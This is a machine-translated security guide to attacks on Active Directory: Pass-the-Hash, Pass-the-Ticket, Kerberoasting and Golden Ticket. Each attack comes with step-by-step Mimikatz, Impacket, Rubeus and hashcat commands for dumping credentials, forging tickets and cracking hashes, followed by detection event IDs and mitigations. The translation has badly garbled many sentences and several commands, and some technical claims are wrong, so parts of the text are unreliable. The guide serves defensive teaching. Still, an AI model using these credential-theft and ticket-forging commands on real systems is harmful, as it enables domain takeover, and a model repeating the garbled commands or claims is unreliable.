Machine Translated by Google

Active Directory Security Guide

The complete active directory

Safety manual
Exploitation, detection, and mitigation strategies
Machine Translated by Google

Table of contents

03 Introduction

04 Active Directory

05 Attack technique 1:
Use of alternative authentication methods (T1550)

sixteen
Attack technique 2:
Kerberoasting

23 Attack technique 3:
Attack of the golden bill

28 Attack technique 4:
DCShadow Attack

32 Attack Technique 5:
AS-REP Tuesday

37 Attack technique 6:
LDAP injection attack

42 Attack Technique 7:
NTLM PetitPotam relay attack in an Active Directory
Certificate Services (AD CS)

47 Conclusion

48 References
Machine Translated by Google

Introduction

Active Directory (AD), introduced with Windows 2000, has become an integral part of the
modern organizations, serving as the backbone of the identity infrastructure for 90%
Fortune 1000 companies. Active Directory is widely used by organizations for its simplicity and
centralized management approach. It is an attractive solution for companies, as it facilitates employees.
access to resources and applications with a single set of credentials, which increases productivity and the
efficiency [3]. Furthermore, its centralized management structure provides a single point of control for the
IT administrators, which allows them to manage users, computers, and access to resources in a single
place [4].

However, due to its widespread use and architectural limitations, Active Directory becomes a
responsibility in the event of a security breach and becomes a priority target for
adversaries seeking to elevate privileges, infect multiple systems, and launch devastating attacks such as the
data exfiltration, the entire system. commitments and ransomware.

The biggest challenges in recovery after a data breach include the identification of the
source, the determination of the extent of the damage and the creation of a new safe environment. According to the Report of

investigaciones de filtraciones de datos de 2022 de Verizon [5], el 80 % de las filtraciones provienen de agentes
externals and, as noted in IBM's 2021 Data Breach Cost Report, once it is hacked
A domain administrator, attackers can hide within their network for up to 277 days before
from detection, which represents a significant threat [6].

The widespread use and ease of access to resources for employees make it a challenge for the
organizations remove obsolete Active Directory (AD) and adopt more secure alternatives like Microsoft Azure
Active Directory (AAD). The transition to AAD addresses some of the limitations of AD through automation.
of administrative tasks, such as user management and group member assignment, to
improve efficiency [7]. However, the same security risks still apply, as a compromise of
The identity infrastructure can have devastating consequences.
Adversaries may also exploit Microsoft Endpoint Manager to move laterally from a tenant.
from Azure to a local AD domain, creating attack pathways between management environments
separated identity [8].

The importance of Active Directory security cannot be overstated, and organizations must be
prepared with disaster recovery plans and careful monitoring to stop attacks before
that the system is damaged or becomes irreparable. The choice between AD and AAD will largely depend on the
needs and the resources of the organization, but the risk of compromise remains regardless of the
election. The safe and effective use of Active Directory requires a clear understanding of the risks.
potential and a commitment to safety practices and protocols.
Machine Translated by Google

Active Directory

Active Directory (AD) is a crucial directory service for managing network resources in networks
based on Windows. It allows for the centralization of the management of several network resources,
including user and computer accounts, resources, and security policies. In this way
AD facilitates the efficient and secure management of networks in a hierarchical structure.

AD operates in a hierarchical structure that consists of domains at the top level and several nested objects.
inside, such as users, computers, and groups. The structure is designed to provide a way
organized and efficient in managing network resources and ensures that security policies are
apply uniformly across the network.

AD uses the Lightweight Directory Access Protocol (LDAP) for communication between domains and
controladores de dominio. LDAP es un protocolo de servicio de directorio que permite la gestión de
distributed directory services over an IP network. In addition, AD uses Kerberos, a protocol
secure authentication for authentication on a network.
This ensures that only authorized users and computers can access the resources of the
network, which enhances network security.

To manage network resources efficiently, Active Directory uses policy objects.

of group (GPO). GPOs are used to control and enforce security policies, the
software implementation and other administrative tasks across the network. AD also provides support for
remote procedure calls (RPC), which allows for remote management of resources
the network. This ensures that network administrators can efficiently manage resources
from the network from a centralized location, regardless of the location of the resources themselves.

However, Active Directory is not immune to attacks, and attacks on AD can have
disastrous consequences for the network. Successful Active Directory attacks consist of three steps
main: discovery, privilege escalation through account credential theft
valid and gain access to other computers on the network/domain. Once the attackers
they strengthen in the target network, immediately changing their focus to gain elevated access to
additional systems that will help them achieve their final objective, such as encrypting and exfiltrating data from the
organization.

In summary, Active Directory is a vital component for managing and protecting network resources.
Windows-based networks. Its hierarchical structure and various functions, such as LDAP and Kerberos, GPO and
RPC provides efficient and secure management of network resources. To keep your network secure,
It is essential to protect Active Directory from attacks by implementing security measures.
solid and keeping the security protocols updated to prevent unauthorized access to the
network resources.
Machine Translated by Google

Attack technique 1:
Use of alternative authentication
Methods (T1550)

Adversarial attacks on a system can often bypass normal access controls by

the use of alternative authentication materials, such as password hashes, Kerberos tickets, and tokens
application access. This technique, known as T1550 in the MITRE ATT&CK framework, allows for
attackers move laterally within an environment and gain unauthorized access.

This section will provide a detailed description of two subtactics of the technique Use methods of
alternative authentication (T1150): Pass-the-Hash (T1550.002) and Pass-the-Ticket
(T1550.003)

Pass the hashish (T1550.002)

Pass-the-Hash (PtH) is an identity-based attack that attackers exploit to obtain

access to systems and additional privileges within a network once they have already compromised the
system.

In a typical Pass-the-Hash scenario, adversaries

obtain initial access to a target network,

steals/downloads user credentials 'hash'
uses leaked credentials

to create a new user session on the compromised host.

Machine Translated by Google

Unlike other attacks, Pass-the-Hash attacks represent a unique form of credential theft.
in which an attacker exploits the Windows New Technology LAN Manager authentication protocol
(NTLM) to self-authenticate on a remote system using the previously calculated hash of a password from the
user. When a user logs into a Windows system that is based on the NTLM protocol, the system
generate an NTLM hash of the user password without using a technique called salting that improves it
security of hash passwords stored on servers and domain controllers.

Unhashes a unique digested output of a one-way mathematical function that takes an input from
various sizes (it can be as long as a classic novel or as short as an 8-character password
digits) and returns a fixed-size string. As these functions are
designed to be unidirectional, which means that having an output should be computationally
it is unfeasible for an adversary to reverse the output, that is, to obtain the plaintext input, the
Password hashing is still a common security practice against data breach attacks.

NTLM is a single sign-on method that uses a challenge and response system to verify the
user identity without asking the user's password. Therefore, this attack technique does not require that
adversaries use third-party cracking tools, as the plaintext version is not needed
from the password; therefore, it eliminates the need to perform cracking operations that consume
long time.

If an attacker obtains the NTLM hash of a user's password through means such as extracting it from the
[Link] of the file %systemroot%\system32\config\SAM, capture it during the transmissions of
red or download it from a backup or a system image, they can use the hash password.
passing the hash to a remote system that recognizes the account of the compromised user. According to the privileges
and the access level of the compromised user, adversaries can gain full access to
system and successfully carry out lateral movement attacks.

It is important to keep in mind that this is not a vulnerability, but a design choice.
deliberate aimed at reducing friction and improving the overall user experience.

Tools and Techniques for Executing Pass-the-Hash Attacks

Pass-the-Hash (PtH) attacks can be executed using various publicly available tools,
like Mimikatz[9] and evil-winrm[10], as well as built-in PowerShell cmdlets. Attackers often
they use these tools or commands to extract the hash from the memory of a system
compromised and then used to gain access to other systems on the network.

Tool 1: Mimikatz

The use of Mimikatz for the Pass-the-Hash attack consists of three main steps.
Machine Translated by Google

Step 1: Steal the password hash

To output a list of users who have recently logged in and their operating system credentials, the
Adversaries often use the module skurlsaen in Mimikatz, which exploits a series of different techniques.
to extract authentication information from LSASS memory, including memory structure analysis and use
from the Windows API. The 'login passwords' function of this module specifically extracts the data from the
login session, such as saved password hashes and cached credentials. This may
include the current user's login information as well as information from other users who have logged in
session on the same machine.

Note that before taking advantage of the command sekurlsa::logonpasswords, attackers must execute the
privilege::debug command for Mimikatz to execute correctly.

By default, LSASS runs with high integrity and is protected against debugging by
part of unauthorized processes. However, by enabling the debugger privilege, the attacker can bypass
this protection and access the LSASS memory to extract the login session data.

Below you will find an example output from step one.

PD> .\[Link] "privilegio::depuración" "sekurlsa::contraseñas de inicio de sesión"

Authentication ID: 0; 302247 (00000000:00049ca7)

Session UndefinedLogonType from 0
Nombre de usuario Alicia
Domain DOMAIN
Login server DC1
Login time 01/12/2023 [Link]
S.I.D. S-1-5-21-3501040295-3816137123-30697657-1109
msv:
Primary
* Nombre de usuario: Alicia
Domain: DOMAIN
NTLM a0c8746a6efc7782c7c19c55185145be

With this NTLM hash, it's time for adversaries to jump to the second stage.

It is important to note that Mimikatz is not the only way to dump NTLM hashes. Adversaries often
They take advantage of other integrated command line applications or third-party tools, such as ProcDump.
yGsecdump, for credential dumping.
Machine Translated by Google

Paso 2:Autenticación a través del hash de la contraseña robada

This is the main step where the adversary passes the hash to impersonate the user and obtain
remote system access.

The command 'sekurlsa::pth' in Mimikatz is a function that facilitates 'Pass-the-Hash' attacks.

This technique allows an attacker to authenticate to a remote system using an NTLM hash.
captured the password of a user, without the need for the real password. To execute this
command, the attacker must provide only the following parameters:

/user:(the username),

/domain:(the domain name), and

/ntlm:(the NTLM hash of the user's password).

Please note that Windows passwords are not limited to the NTLM protocol only, but also
you can use popular block encryption algorithms like AES-128 and AES-256 for the
password storage. In such cases, adversaries would have to use the
parameters /aes128:o /aes256:instead of /ntlm:.

PS> .\[Link] "sekurlsa::pth /user:Alice /domain:[Link]

/ntlm:a0c8746a6efc7782c7c19c55185145be

user Alicia
domain: [Link]
program: [Link]
imperative: no
NTLM :a0c8746a6efc7782c7c19c55185145be
. . .

Notice how easily we gained access to a remote system by only knowing the username.
and the NTLM hash of the victim's password.

Step 3: Access the resources through a new user account

In the third step, the attacker uses the newly obtained user account to expand their access to the
red. For example, the adversary can use a command line utility called PsExec to
perform remote code execution on another host.

For example, the attacker can execute the following command to run the process "[Link]" in the
remote machine with an internal IP address "[Link]"

[Link]\[Link]

Mimikatz is not the only way to carry out a Pass-the-Hash attack. Adversaries often also
usanPowerShell .
Machine Translated by Google

Tool 2: PowerShell

It is common for adversaries to use the Invoke-WMIExec cmdlet, which allows for the execution of commands.
arbitrary on a remote Windows machine using WMI (Windows Management Instrumentation
Windows), to carry out a PtH attack.

Please note that Invoke-WMIExec is a built-in PowerShell cmdlet that is present.

in many recent Windows systems. This feature allows the execution of commands
arbitrary on a remote Windows machine through Windows Management Instrumentation (WMI).
You can run Invoke-WMIExec directly from a PowerShell prompt or integrate it into a
PowerShell script.

Being an integrated cmdlet, the attack using Invoke-WMIExec is more covert, as it does not
does not require additional downloads or installations.

For example, if you have a password hash of the user named Alice from our previous scenario, a
the adversary can execute the following command.

Invoke-WmiExec-target [Link] -hasha0c8746a6efc7782c7c19c55185145be

-nombre de usuario Alice-nombrede hostdel comando

In the previous command, an adversary uses the script Invoke-WmiExec to execute the command 'hostname'.
on the remote machine with the internal IP address [Link].

Tool 3: evil-winrm

"evil-winrm" is a Ruby gem that allows for remote command execution on a

machine with Windows using the Windows Remote Management (WinRM) protocol. Like evil-winrm
it is not an integrated tool, adversaries must install it before using it. Several options for
Installation is available in the corresponding GitHub repository [10].

In a Pass-the-Hash attack using evil-winrm, the attacker specifies the username, the hash
NTLM and the IP address of the target system as parameters in the evil-winrm command [14].

For example, the following command can be used to carry out a PtH attack on a Windows machine.
with the IP address [Link], using the username 'Alice' and the NTLM hash
"a0c8746a6efc7782c7c19c55185145be" :

mal-gain -u Alicia -Ha0c8746a6efc7782c7c19c55185145be-i [Link]

With this information, evil-winrm establishes a remote connection with the target system and authenticates.
as the specified user (Alice), which allows the attacker to execute arbitrary commands on the
remote machine.
Machine Translated by Google

Detection methods for the Pass the Hash attack

Below are added known event IDs to detect a possible Pass-the-Hash attack [15], [16], [17], [18]:

Id. de evento 1 : creación del proceso.

Key description fields: LogonId, ParentProcessId, ParentImage, CurrentDirectory,

CommandLine, IntegrityLevel, ParentCommandLine, ParentCommandLine, UtcTime,

ProcessId, Usuario, Hashes, Imagen

Event ID 5: process completed.

• Key description fields: UtcTime, ProcessId:, Image

Event ID 10: the process was accessed.

Key description fields: SourceThreadId, TargetProcessId, GrantedAccess,

Imagen de origen, Imagen de destino

Event ID 4624: Successfully logged on to an account.

• Campos de descripción clave: Nombre de la cuenta, Dominio de la cuenta, ID de inicio de sesión

Id. de evento 4663 : se intentó acceder a un objeto.

• Key description fields: Process ID, Access Mask, Account Domain, Object Name,

Nombre de proceso, Tipo de objeto, ID de inicio de sesión, ID de identificador

Id. de evento 4672 : privilegios especiales asignados al nuevo inicio de sesión.

Key description fields: security ID, account name, account domain

Id. de evento 4688 : se ha creado un nuevo proceso.

• Key description fields: mandatory label, account domain, source process name, new

Nombre del proceso, Tipo de escalada de token, ID de proceso nuevo, ID de proceso de origen

Mitigation techniques for the Pass the Hash attack

To mitigate the risk of pass-the-hash attacks, organizations can implement various technical measures. One of those
The measures include enabling Credential Guard of Windows Defender, a feature that was introduced in Windows 10 and Windows

Server 2016. This tool leverages virtualization to secure credential storage and
restrict access only to trusted processes.
Machine Translated by Google

Another measure is to revoke the administrator privileges of the users' workstations. This
limits an attacker's ability to execute malware and extract hashes from [Link]. Additionally,
limit the number of endpoints where users have administrative privileges and avoid the
Administrative privileges through security boundaries reduce the risk of it being used.
compromised credential to escalate privileges.

Randomize and store local administrator passwords with a solution like Local
Microsoft's Local Administrator Password Solution (LAPS) also adds an additional layer of security,
since it reduces the ability of an attacker to move laterally with local accounts that
they share the same password. It is also recommended to avoid local accounts from authenticating to
through the network, which can be achieved by using SIDs known in group policies.

Pass the ticket (T1550.003)

Pass the Ticket (PtT) is a technique that allows an attacker to use a ticket-granting ticket.
previously acquired Kerberos. The TGT is a crucial component of the Kerberos protocol, as it
allows a user to authenticate across multiple systems without having to enter their password
every time.

The grant voucher of vouchers (TGT) is a type of voucher issued by the domain controller (DC)
to a user after a successful authentication in the domain. It includes crucial information, such as
the user's session key, group membership, and privileges, which are used to make requests
service tickets for specific services in the target systems. Kerberos encrypts the TGT
using the user's password hash and employing symmetric encryption algorithms (such as DES
to AES) according to the configuration of the Kerberos environment. After encryption, the TGT is sent
to the user's computer and is stored in the memory.

When the user wants to access a resource in another system, they use the TGT to request a
service ticket to the DC. The service ticket is also encrypted with the session key of the
user and contains an encrypted session key that can be used to
log in to the destination system Then, the service ticket is sent to the user's account.
computer, where it is used to authenticate in the destination system.

Having a stolen TGT key, an adversary can request a service ticket from the DC for a
specific service in a target system to gain access to its resources.

Tools and techniques for executing Pass-the-Ticket attacks

Pass-the-Ticket (PtH) attacks can be executed using various available tools.

publicly, such as Mimikatz, Kekeo, Rubeus, Creddump7, etc. Attackers often
use these tools to extract Kerberos TGT from the memory of a compromised system and
then use them to gain access to other systems on the network.
Machine Translated by Google

Tool 1: Mimikatz

The use of Mimikatz for the PtT attack consists of four main steps.

Step 1: capture Kerberos tickets for valid accounts

An attacker can use the command sekurlsa::ticketsMimikatz with the /export parameter to extract
all lostickets from Kerberos memory and save them as .kirby files and save them in the same
folder where the executable file of Mimikatz is located.

By examining the names of the .kirbi files, it is possible to determine if there are Kerberos tickets.
for a domain administrator, like DOMAIN\Alice:

[Link] "privilege::debug" "sekurlsa::dumper /export"

PD>dir | find "Alicia" | findstr "krbtgt"
...

Alice@[Link]
...

The second command, dir | find "Alicia" | findstr "krbtgt", lists all the files in the
current directory and pipes the output to the findstr command to search for the text "krbtgt". The purpose of
this command is to find the Kerberos ticket files related to the user "Alice".
They can include the string "krbtgt" in the filename.

Please note that Mimikatz is not the only tool for obtaining Kerberos tickets.
adversaries can use the Rubeus tool to generate raw AS-REQ traffic to request a TGT
with a username and password provided. The advantage of this attack is that the
The password provided to Rubeus can be encrypted in RC4, DES, and AES algorithms.
and the attack would still work [22].

Step 2: Reuse the ticket

This is the main step of the Pass-the-Ticket attack.

In this step, the attacker uses the Mimikatz command kerberos::ptt to insert the obtained TGT into their
own session, which makes your session acquire the identity and permissions.
from the stolen TGT for future access to resources without knowing the plaintext credentials.
This allows the adversary to access resources that would otherwise be protected by the
Kerberos authentication [23].
Machine Translated by Google

PD> [Link] "kerberos::ptt

C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-Alice@[Link]

File:
'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@[Link]':OK

Please note that the previous command is used to insert the Kerberos ticket granting ticket.
(TGT) stored in the corresponding .kirbi file for the current session.

To ensure that the correct ticket was injected, an adversary can use 'kerberos::list'
Mimikatz Command.

PD> [Link]"kerberos::list"
aes256_hmac
Inicio/Fin/MaxRenew: 13/01/2022 [Link] ; 13/01/2022 [Link] ; 13/01/2022
[Link]
Server Name krbtgt/[Link] @ [Link]
customer name : Alicia @ [Link]
Banderas 40e10000 : nombre_canonicalizar; pre_auténtico; inicial ; renovable;
renewables;

It is important to mention that the TGT has a finite lifespan and will expire after a certain period.
over time. The user will need to re-authenticate in the domain to obtain a new TGT.

Step 3: Discover the privileges of the stolen ticket

Once a obtained ticket is ready for reuse, the attacker needs to identify its capabilities, it is
say, where it can be used. A TGS can only provide access to the specific resource for which it was issued,
and the attacker can find that information by examining the TGS.

To use a TGT, the attacker may need to perform an internal discovery phase to find out the
access it grants. This can be as simple as checking the user's group memberships and
look for clear signals.

Numerous tools can be used to gather information about Active Directory.

However, an attacker can also use built-in commands like 'net' to gather
that information without alerting the security controls.
Machine Translated by Google

PD>networkuserAlice/domain
The request will be processed in a domain controller for the domain [Link].

Username Alicia
Full name Alicia Oswell
Comment
user comment

Country/Region Code 000 (system default)

active account Yes
The account expires Never
. . .
Local group memberships
Global group memberships Workstation administrators VPNuser

*FileServer1_PublicShare *Domain Users

The command was completed successfully.

Paso 4:Acceder a los recursos a través de una nueva cuenta de usuario

Lastly, the attacker can use the system's built-in utilities laterally in a stealthy manner because
operational to try to gain access to other resources and promote their objectives. For example, the adversary could
take advantage of the command line utility PsExec to run [Link] on a workstation
remote.

Detection methods for the Pass the Ticket attack

The following are known event IDs to detect a possible Pass-the-Ticket attack [15], [16]:

Event ID 4768: A Kerberos authentication ticket (TGT) was requested.

• Key description fields: account name, service name (always "krbtgt"), service ID,
Customer address

Event ID 4769: A service ticket for Kerberos was requested.

Key description fields: account name, service name, customer address

Id. de evento 4770 : se renovó un vale de servicio de Kerberos.

• Campos de descripción clave: nombre de cuenta, ID de usuario, nombre de servicio, ID de servicio

Machine Translated by Google

Mitigation techniques for the Pass the Ticket attack

Effective measures to counteract pass-the-hash attacks focus on making
tickets are harder to steal and limit the potential impact of a stolen ticket. One of those
measures is to use Microsoft Windows Defender Credential Guard. This technology, which
introduced in Windows 10 and Windows Server 2016, leverages virtualization to secure the
storage of credentials and providing access only to trusted processes.

Another important step is to limit the number of endpoints where users have privileges.
administrative. This significantly reduces the risk of an attacker using a stolen ticket to
the lateral movement. It is also important to avoid granting administrative privileges through the
security limits, as this greatly reduces the risk of an attacker using a ticket
stolen to escalate their privileges.
Machine Translated by Google

Attack technique 2:

Kerberoasting

Kerberoasting is a technique used to obtain password hashes for Active Directory user accounts.
Directory(AD) that have servicePrincipalName(SPN) values.

In AD environments, SPNs are registered in user or computer accounts, known as 'accounts'.

service." These accounts are used to run services and applications, and are generally necessary for
server minimum privilege to perform its function. When a client requests a service granted by a
use the SPN to locate the service account linked to the service. Then, the client authenticates in
the service using the credentials of the service account, which are stored as a password hash in
AD.

In the case of Kerberoasting, an attacker can exploit the SPN value of a service account to request
a service ticket (TGS). The TGS ticket can be encrypted (through RC4) with the password hash of the account
of service assigned to the requested SPN as a key. This means that an attacker who captures TGS tickets in the
network traffic or extracts it from memory can extract the hash of the service account password
and perform an offline brute force attack to recover the plaintext password.
Machine Translated by Google

Please note that Kerberoasting and Pass-the-Ticket attacks are two different techniques that are used.
to steal or impersonate valid credentials in a Kerberos environment.

Kerberoasting is a method to obtain credentials for service accounts by requesting tickets for
service of a domain controller and decrypting them offline. It allows the attacker to obtain
access to network resources using the hash of the service account password.
Pass-the-Ticket, on the other hand, is a technique in which an attacker steals a ticket grant voucher.
(TGT) from Kerberos of a user's session and uses it to impersonate the user and obtain
access to network resources.

Kerberoasting attacks can be executed using various tools and utilities available.
publicly, like the Impacket scripts.

Tools and techniques for performing Kerberoasting

For this attack, not a single tool is used, but a collaboration of them, such as Mimikatz, Rubeus,
Impacket, John the Ripper, Hashcat.

Tool 1: impact package

The Kerberoasting attack that exploits the Impacket script consists of three main parts.

Step 1: Identify the SPN and request the TGS

The first step in Kerberoasting attacks is to enumerate (or identify) servicePrincipalNames.

and request service tickets (TGS).

The ImpacketGetUserSPNs script (Python) can perform all the necessary steps to request a ST for
a service given its SPN and valid domain credentials [24]:

with a password
[Link] -outputfile [Link] -dc-ip$KeyDistributionCenter
DOMAIN/USER:Password

with an NT hash
[Link] -output file [Link] -hashes 'LMhash:NThash' -dc-ip
$KeyDistributionCenter'DOMAIN/USER'

The previous command uses the script [Link] and specifies an output file,
"[Link]", where the obtained password hashes will be stored.

The indicator -dc-ip to specify the IP address of the domain controller and the indicator -outputfile for
specify where the obtained password hashes will be stored. Also use the
DOMAIN/USER:Password or 'DOMAIN/USER' to provide the domain, name of
username and password/NT hash of a valid domain user to request the ST.
Machine Translated by Google

Note that adversaries can also exploit the CrackMapExec (CME) tool to
perform Kerberoasting on a list of systems specified by $TARGETS[24].

crackmapexec ldap $OBJECTIVES -u $USER -p $PASSWORD --kerberoasting

[Link] --kdcHost $KeyDistributionCenter

The previous command uses the --kerberoasting flag to specify an output file to save the hashes.
obtained password and the indicator--kdcHost to specify the IP address of the domain.

Step 2: Offline decryption of the hash

Having stolen passwords in the [Link], the adversary can carry out an offline brute force attack.
line to obtain the plaintext password using third-party tools, such as John the Ripper or Hashcat.

john--format=krb5tgs --wordlist=$kerberoastable word [Link]

The previous command uses the indicator --format=krb5tgs to specify that the hash values in the file "[Link]"
are in the format of Kerberos 5 TGS (Ticket Granting Service) and
--word list indicator to specify the location of the word list file that will be used in the process of
decrypted. Once the command is executed, John will try to find a match between the password hashes and
the words in the word list file.

Step 3: Using new privileges to promote objectives

Once the password has been decrypted, the attacker can use the service account credentials to access the
network resources and promote their objectives. This may include data exfiltration, lateral movement within the network or the
escalation of their privileges.

Tool 2: Rubius

The Kerberoasting attack that exploits Rubeus consists of four main parts.

Step 1: enumerate servicePrincipalNames

The first step of a Kerberoasting attack is to identify and enumerate the service principal names (SPN) of the accounts.
destination service with the desired privileges.

For this reason, adversaries can develop custom LDAP filters to search for users with SPN values.
registered for the current domain [25].
Machine Translated by Google

$ldapFiltro=
(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))
$domain=New-Object [Link]
$search=New-Object [Link]
$[Link] =$dominio
$[Link] =1000
$[Link] =$ldapFilter
$[Link] ="Subtree"
Run search

$resultados= $[Link]()
Show SPN values of the returned objects
$Resultados= foreach($resultadoen$resultados)
{
$entrada_result = $[Link]()

$resultado_entrada|Seleccionar objeto@{
Nombre ="Nombre de usuario";Expresión = { $_.sAMAccountName }
}, @{
Nombre ="SPN";Expresión = { $_.servicePrincipalName |Seleccionar objeto
-Primero1 }
}
}

$Resultados

Please note that SPNs consist of two parts:

the hostname of y
service class.

The service class is the name of the service, such as 'HTTP' or 'ldap', and the hostname is the
DNS hostname or the IP address of the machine where the service is running. For example,
an SPN for a web server could be 'HTTP/'
[Link], where 'HTTP' is the class of service and
[Link] is the host name.

The possible output of this LDAP filter is the following:

Username SPN
-------- ---
AccountService1 http/webserver1
ServiceAccount2 cifs/appserver2
Machine Translated by Google

Step 2: TGS ticket request

An attacker can target specific service accounts by identifying and enumerating their names.
service principals (SPN) and then request tickets from the Ticket Granting Service (TGS) for these
service accounts. Tools like Rubeus can be used to automate this process.
extracting password hashes from memory [26].

PD> .\[Link] kerberoast /simple /outfile:[Link]

Action: Kerberoasting
Notice: AES hashes will be returned for accounts enabled for AES.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
Searching for the current domain for Kerberoastable users
[*] Total de usuarios de kerberoastable:2
Hash written in C:\Tools\[Link]
Toasted hashes written in: C:\Tools\[Link]

PS>Obtener-Contenido .\[Link]

$krb5tgs$23$*ServiceAccount1$[Link]$http/webserver1*$45FAD4676AECDDE4C1397BF
CED441F79$DEB. .

# ... truncated output ... #

Step 3: decrypt the password online

The next step in the attack is to obtain the plaintext passwords of the service accounts, this
the process is carried out through an offline brute force attack, which means that the attacker does not need
communicate with the active directory, making it undetectable.

To carry out this task, the attacker can use different tools such as John the Ripper.
Hashcat, which is specifically designed to crack passwords using password dictionaries
common:

PS> .\[Link] -m 13100 -o [Link] -a 0 .\[Link]

.\[Link]
Machine Translated by Google

The command uses the executable [Link] and specifies the following flags:

-m 13100: this mark is used to specify the type of hash, in this case Kerberos 5 TGS
(Bill Issuance Service)

this indicator is used to specify the output file where

the passwords will be saved

• This flag is used to specify the attack mode, in this case 0 means attack mode.
Straight

The command also specifies the file paths of [Link] and [Link]. Once executed,
command, Hashcat will attempt to find a match between the password hashes in the file
[Link] and the words in the [Link] file.

Step 4: Using new privileges to promote objectives

Once the password has been decrypted, the attacker can use the service account credentials to
access network resources and promote their objectives.

For example, by having the account credentials, the adversary can use the tool with the parameter /
netonly to run PowerShell as the user "ServiceAccount1".

Detection methods for the Kerberoasting attack

It is possible to identify several signs of Kerberoasting by examining the Windows event log for
unusual requests for the ticket granting service (TGS) [27], [28].

Id. de evento 4769 : se solicitó un vale de servicio de Kerberos.

• Campos de descripción clave: nombre de la cuenta, nombre del servicio, dirección del cliente

Id. de evento 4770 : se renovó un vale de servicio de Kerberos.

• Campos de descripción clave: nombre de cuenta, ID de usuario, nombre de servicio, ID de servicio

Machine Translated by Google

Mitigation techniques for the Kerberoasting attack

To protect the service account passwords from Kerberoasting attacks, certain measures can be taken
various measures, such as [29]:

Mitigation Technique 1: rejection of authentication requests that do not use Kerberos

Flexible Authentication Secure Tunneling (FAST)

This is also known as Kerberos shielding. This pre-authentication extension creates a channel.
secure between the client and the domain controller, with the aim of enhancing the protection of the tickets
Kerberos against offline password cracking attempts. While FAST can eradicate
the threat posed by Kerberoasting, implementing it quickly and effectively in an organization
it can be a challenge.

Mitigation Technique 2: Elimination of the use of insecure protocols in Kerberos

Although completely disabling RC4 is an important task, it is possible to configure accounts for
individual services so that they do not accept the RC4 protocol. When setting the attribute
msDS-SupportedEncryptionTypesen0x18(decimal 24), only AES128 and AES256 will be enabled. This
change not only improves security, but also facilitates the detection of malicious activities, as
the use of RC4 in a TGS request is a stronger indicator.

Mitigation technique 3: Adopt strong password hygiene practices for accounts

of service

Service account passwords should be generated randomly and have a minimum length
of 30 characters and change frequently.
Machine Translated by Google

Attack Technique 3:

Attack of the golden ticket

The Golden Ticket attack involves forging a Kerberos ticket to gain unauthorized access to a
computer system as a privileged user. To carry out the attack, an attacker must obtain the
NTHash of the krbtgt account, the account responsible for encrypting and signing all tickets within a domain.
as well as the domain Security Identifier (SID). With this information, the attacker can create a
fraudulent golden ticket that mimics a legitimate ticket issued by the authentication server of the domain.
This golden ticket gives the attacker the ability to access confidential information and resources.
in the target system.

Tools and Techniques for Conducting a Golden Ticket Attack

Adversaries can use various third-party tools, such as Mimikatze and Impacket, to perform a
attack with Golden Ticket.

Tool 1: impact package

In this scenario, we will assume that while carrying out a Kerberoasting attack, an attacker downloaded a
hash file and decrypted it to gain administrator access to the domain controller.
In other words, we have the plaintext password of an admin user who can access.
to the DC. In addition, our domain name will be [Link] for greater efficiency.

A typical Golden Ticket attack with Impacket consists of two main parts.
Machine Translated by Google

Step 1: Forging a golden ticket

To create a valid golden ticket, certain information is required, such as the NTHash of the krbtgt account of the controller
domain and the domain SID. This information can be obtained using the [Link] script from Impacket, always
that the attacker has administrative access to the domain controller. Below you will find the proper syntax for
dump NTHash for the krbtgt account [30].

Administrator of [Link]: "Password"@<DC_IP_Address>

Assume that NTHash is bf106a6860c6f7b3317c653a38aba33.

Next, the attacker needs to know the domain's SID. To do this, they can take advantage of the tool
[Link] Impacket. Note that although the attacker chooses the domain controller as the target, this
attack works with any domain controller.

[Link]/Administrator:"Password"@<DC_IP_Address>

Assume that the domain SID is S-5-1-5-21-2049251289-867822404-1193079966.

Finally, the attacker uses the tool [Link] from Impacket to forge a golden ticket for a user.
domain. One advantage of [Link] is that the forged ticket is written to a .ccache file instead of a .kirbi; in other
words, the attacker does not have to convert it.

[Link]-nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid

"S-5-1-5-21-2049251289-867822404-1193079966" -domain [Link] Alice

Please note that the above command is an example of an attacker forging a golden ticket for a
non-existent domain administrator, Alice.

Step 2: Use a golden ticket

To configure the golden ticket for use, the KRB5CCNAME environment variable must be set to the path of the
.ccache file, which can be an absolute or relative file path. The environment variable KRB5CCNAME
It is used to inform the Impacket tools that support Kerberos tickets where to find the ticket. This allows you
allows the attacker to use the golden ticket to access the system as a privileged user.

Then, the adversary can use the command execution tools from Impacket, such as [Link],
[Link], to load and authenticate with the ticket, which eventually gives the adversary execution
of command. For Kerberos authentication to work, the adversary must provide the target's IP address,
IP address of the domain controller and the domain.
name.
Machine Translated by Google

[Link]$[Link]/$Administrator@$TARGET_NAME -target-ip $TARGET_IP

-dc-ip $DC_IP -no-pass -k

Please note that while the no-passle option tells the script to skip authentication based
in password, the option -k specifies that the Kerberos ticket must be taken from KRB5CCNAME
Environmental variable. The purpose of this script is to execute commands remotely on the computer.
destination using Kerberos authentication without having to enter a password.

Tool 2: Mimikatz

A typical Golden Ticket attack with Impacket consists of three main parts.

Step 1: Compromise the password hash for the krbtgt account

As was the case with the Impacket scenario, for a Golden Ticket attack to work, a
The adversary must have administrative access to a domain controller. Therefore, we will begin
with this assumption.

To exfiltrate the password hash of the user krbtgt, the attacker can use the
command 'lsadump::dcsync'.

PD>[Link] "lsadump::dcsync /user:DOMAIN\KRBTGT"

Username SAM krbtgt

Nombre principal de usuario: krbtgt@[Link]
Last password change: 03/09/2020 [Link]
Object security ID: S-1-5-21-5840559-2756745051-1363507867-502 #

Credentials letters:
Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159 # Hash NTLM
. . .
aes256_hmac (4096) :
ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
. . .

Please note that "lsadump::dcsync /user:DOMAIN\KRBTGT" is a command line argument

commands for Mimikatz that instruct it to perform a 'DCSync' operation using the
user account "DOMAIN\KRBTGT", which is the default account used by the Service
Kerberos authentication in Windows Active Directory environments [31].

Step 2: Kerberos ticket forgery

By gaining access to the KRBTGT password hash, they can use Mimikatz to forge tickets.
Kerberos. This may involve creating a false Ticket Granting Ticket (TGT) to
a non-existent user account.
Machine Translated by Google

Please note that the November 2021 security updates for Kerberos have patched
this attack method. As a result, if the domain controllers installed the update, it should
use a real user account.

To forge a TGT, the attacker must provide certain information to the Mimikatz function.
